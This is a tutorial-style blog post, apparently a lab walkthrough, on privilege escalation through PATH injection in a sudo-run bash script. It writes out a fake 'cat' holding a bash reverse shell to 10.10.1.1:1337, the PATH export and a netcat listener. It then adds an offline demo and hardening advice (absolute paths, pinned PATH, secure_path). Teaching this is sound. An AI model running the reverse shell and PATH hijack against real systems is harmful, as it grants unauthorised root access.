Hi everyone!

Today's post is on path injection. Let's get started.

Identifying path injection vulnerability

There are many ways a path injection vulnerability can arise, but this post only looks at one of them: bash scripts that are run with elevated privileges through sudo.

The vulnerability shows up when a script that runs as root calls a command without its full path. The shell then has to look the command up in the directories listed in the $PATH environment variable, and if the user who triggers the script can control that variable, they control which binary gets run as root. Let's see the example below:

cmd$ sudo -l
[sudo] password for soulx:
User soulx may run the following commands on previse:
    (root) /home/soulx/vulscript.sh

Inside vulscript.sh:

#!/bin/bash
# "cat" is resolved through $PATH instead of being called as /bin/cat
cat /etc/shadow > /dev/null 2>&1

In this case, cat was called without its full path. When the script runs, bash searches each directory listed in $PATH, in order, for a file named cat and executes the first one it finds. If we can put a directory we control at the front of $PATH, our own cat is executed instead of /bin/cat, and because sudo runs the script as root, it runs with root privileges.

Creating a malicious file

cmd$ nano /tmp/cat

Add the code below to the malicious cat file:

#!/bin/bash
# bash reverse shell: connects back to 10.10.1.1:1337 and attaches an interactive shell
bash -i >& /dev/tcp/10.10.1.1/1337 0>&1

Remember to change the IP address to your own. After doing so, save the file.

Make it executable

After creating the file, we have to make sure it is executable by changing its permissions. Only the execute bit matters here, so chmod +x /tmp/cat is enough; 777 also works, but it leaves the file world-writable, which the attack does not need.

cmd$ chmod 777 /tmp/cat

Modify $PATH environment

Since the malicious file lives in /tmp, we prepend /tmp to $PATH so that it is the first directory searched when the script asks for cat. One caveat: this only works if sudo passes your $PATH through to the script. Many distributions ship a Defaults secure_path entry (together with env_reset) in sudoers that replaces PATH for every command run through sudo, in which case the script never sees /tmp. The "Matching Defaults entries" section at the top of the sudo -l output shows whether that is in place on the target.

cmd$ export PATH="/tmp:$PATH"

Exploit!

Set up a listener

Before running the vulnerable script, start Netcat on your own machine listening on the port you put in the malicious cat file:

ownsys_cmd$ nc -lvnp 1337

Exploit the vulnerable script

We can now run the vulnerable script through sudo. When it reaches the cat line, the lookup hits /tmp first and our malicious cat is executed as root instead of the real one.

cmd$ sudo /home/soulx/vulscript.sh

Your Netcat listener should receive an incoming connection, giving you a root shell!
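To make the mechanism behind these steps easy to reproduce, here is an added example (my own code, not part of the original post) that replays the whole chain offline: a fake cat in a directory we control, a script with the same flaw as vulscript.sh, and a hardened version of that script that pins $PATH and calls /bin/cat by absolute path. It needs no sudo, no second host and no reverse shell; the fake cat just drops a marker file so the hijack can be observed. The directory names, the marker file and the use of /etc/passwd as a harmless stand-in for /etc/shadow are assumptions for the demo, and the scripts use /bin/sh so it runs on any POSIX system.

```shell
#!/bin/sh
# Added example (not from the original post): PATH hijack against a
# throwaway script, beside the hardened script that survives it.
set -u

# Scratch directory for the fake "cat", both scripts and a marker file.
WORK="$(mktemp -d)"
MARKER="$WORK/hijacked.marker"

# Stand-in for the malicious /tmp/cat: instead of a reverse shell it
# creates a marker file so we can tell, offline, that it was executed.
printf '#!/bin/sh\n: > "%s"\n' "$MARKER" > "$WORK/cat"
chmod +x "$WORK/cat"

# Vulnerable script, same shape as vulscript.sh: "cat" resolved via $PATH.
# /etc/passwd stands in for /etc/shadow so it runs unprivileged.
cat > "$WORK/vulscript.sh" <<'EOF'
#!/bin/sh
cat /etc/passwd > /dev/null 2>&1
EOF
chmod +x "$WORK/vulscript.sh"

# Hardened script: set PATH to trusted directories before anything else
# and call the binary by absolute path, so a caller-controlled PATH
# cannot redirect the lookup.
cat > "$WORK/fixed.sh" <<'EOF'
#!/bin/sh
PATH=/usr/bin:/bin
export PATH
/bin/cat /etc/passwd > /dev/null 2>&1
EOF
chmod +x "$WORK/fixed.sh"

# Run a script with the attacker's directory prepended to PATH (the
# export PATH="/tmp:$PATH" step) and report whether the fake cat ran.
run_with_hijacked_path() {
  rm -f "$MARKER"
  PATH="$WORK:$PATH" "$1"
  if [ -e "$MARKER" ]; then echo hijacked; else echo safe; fi
}

vulnerable_result() { run_with_hijacked_path "$WORK/vulscript.sh"; }
hardened_result()   { run_with_hijacked_path "$WORK/fixed.sh"; }

echo "vulscript.sh: $(vulnerable_result)"   # hijacked
echo "fixed.sh:     $(hardened_result)"     # safe
```

The fix on the defensive side is the same one a script reviewer should look for: either the script sets its own PATH to a trusted list at the top, or every external command is called by absolute path (ideally both). On the sudo side, a secure_path entry in sudoers gives the same protection to every script without editing them.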

I hope these tips have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
